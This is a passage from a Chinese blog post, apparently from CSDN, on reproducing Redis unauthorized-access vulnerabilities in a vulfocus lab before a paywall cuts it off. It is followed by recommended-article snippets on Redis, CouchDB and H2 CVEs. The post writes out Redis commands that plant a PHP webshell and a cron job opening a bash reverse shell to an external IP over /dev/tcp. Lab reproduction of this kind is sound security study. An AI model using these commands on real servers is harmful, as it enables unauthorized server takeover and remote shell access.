数据库安全(redis、couchdb、h2database)CVE复现

最新推荐文章于 2025-06-23 10:38:07 发布
最新推荐文章于 2025-06-23 10:38:07 发布
阅读量926 收藏 25
点赞数 18
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65049289/article/details/137080458

redis服务默认端口:6379;我们可以通过端口扫描来判断是否存在该服务。

Redis 是一套开源的使用ANSI  C 编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。 Redis 如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

复现环境:

靶场:vulfocus

 攻击机:本机window11  ip:192.168.1.3

Redis未授权访问

CNVD-2015-07557

我们启动靶场之后,首先使用工具进行连接。发现可以连接成功并且可以执行命令,说明存在未授权访问。(其实攻击方式就是基于拿到了对方执行命令的权限,我们如何攻击)

 攻击方式:

  • 如果对方服务器存在web服务,我们写webshell(需要有写的权限),利用工具连接,从而拿到服务器权限。

config set dir /tmp            #设置WEB写入目录

config set dbfilename 1.php    #设置写入文件名

set test "<?php phpinfo();?>"  #设置写入文件代码

bgsave                         #保存执行

save                           #保存执行

  •  写定时任务反弹shell,

利用条件:Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态。

config set dir /var/spool/cron

set yy "\n\n\n* * * * * bash -i >& /dev/tcp/47.94.236.117/5555 0>&1\n\n\n"

config set dbfilename x

最低0.47元/天 解锁文章

200万优质内容无限畅学
红队攻防渗透技术实战流程:数据库安全Redis&CouchDB&H2Database
HACKONE的博客
06-15 289
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。对服务进行类别划分,通过服务功能理解,如数据库有帐号密码就有爆破利用方法,也可以针对服务公开的CVE进行漏洞测试及服务常见的错误安全配置导致的未授权访问等。允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。
Redis未授权访问漏洞复现
xunhuanmao的博客
09-22 2775
Redis未授权访问漏洞的环境搭建以及利用方式。
Reids RCE-CVE-2022-0543 复现
weixin_52532634的博客
02-02 534
local f = io.popen("在这里命令", "r");编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问。一般都是默认的端口好6379,这里端口号是环境映射的。
Day78:服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞
qq_61553520的博客
04-01 1522
小迪安全-Day78:服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞
Redis 缓冲区溢出漏洞(CVE-2024-31449) CPE 高危
最新发布
冰恋云的专栏
06-23 1026
1. firewall-cmd --zone=public --list-ports ##查看已开放的端口。Redis Labs Redis整数溢出漏洞(CVE-2021-32762Redis Labs Redis整数溢出漏洞(CVE-2021-41099)Redis Labs Redis整数溢出漏洞(CVE-2021-32687)Redis Labs Redis整数溢出漏洞(CVE-2021-32628)Redis Labs Redis整数溢出漏洞(CVE-2021-32627)
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ranzi.
05-07 3151
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 2238
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
linux下rce远程代码执行漏洞,Redis 远程代码执行漏洞(CVE-2016-8339)
weixin_33251169的博客
05-08 627
Redis 远程代码执行漏洞(CVE-2016-8339)发布日期:2016-11-07更新日期:2016-11-15受影响系统:Redis Redis 3.2.x < 3.2.4描述:BUGTRAQ ID: 93283CVE(CAN) ID: CVE-2016-8339Redis是一个开源、支持网络、基于内存、键值对存储数据库,使用ANSI C编写。Redis 3.2.x < 3....
服务攻防_01数据库安全Redis&Couchdb&H2database
fencecat的博客
07-20 1493
本节内容涵盖了对几种常见数据库可能存在的安全漏洞进行复现的方法,包括Redis的未授权访问与已知CVE漏洞、CouchDB的未授权越权漏洞与已知CVE漏洞,以及H2 Database的未授权访问漏洞与已知CVE漏洞。
CVE-2022-0543(redis沙盒逃逸)
huayimy的博客
02-03 1012
CVE-2022-0543(redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
redis漏洞修复:CVE-2022-35977、CVE-2023-22458、CVE-2023-28856
大新新大浩浩的博客
09-20 1538
redis漏洞修复:CVE-2022-35977、CVE-2023-22458、CVE-2023-28856
CVE-2022-0543(Redis 沙盒逃逸漏洞)
热门推荐
Battery的博客
11-23 11万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。
内置数据库H2和内置Redis(测试结果来啦)
dageliuqing的博客
10-27 1430
内置的数据库H2,可以让我们在无依赖数据库的情况下,做集成测试。比如我们想测试添加一个学生到数据库,就需要启动一台数据库来验证结果。然而使用H2内置数据库的话,就可以在无依赖数据库的情况下,进行验证。数据库H2是内存级的,如果有大量集成测试(IT:Integration Test)的话,可以缩短测试时间。Embedded Redis同上,使我们在无依赖Redis的情况下,做测试。
Redis Lua沙盒绕过命令执行(CVE-2022-0543)
jiji_king的博客
07-07 362
个人笔记
Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现
XXokok的博客
11-25 813
Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现
Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
MateSnake的博客
05-17 2154
Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
【Linux】环境下升级redis
m0_52985087的博客
10-24 4740
最近漏洞扫描服务器发现,Redis 缓冲区溢出漏洞(CVE-2024-31449),解决办法redis更新到6.2.16、7.2.6或7.4.1及以上版本。
redis-CNVD-2015-07557
m0_51369969的博客
07-13 894
redis设计缺陷,导致服务器被添加账号用于ssh远程登录
Node.js数据库交互:LevelDB、RedisCouchDB探索
本书探讨了在Node.js环境中与LevelDB、RedisCouchDB这三种不同类型的数据库交互的方法和应用场景。作者指出,Node.js因其事件驱动和流处理特性,适合作为后端系统和客户端之间的智能代理,同时也常用于构建传统Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凌晨四点半sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值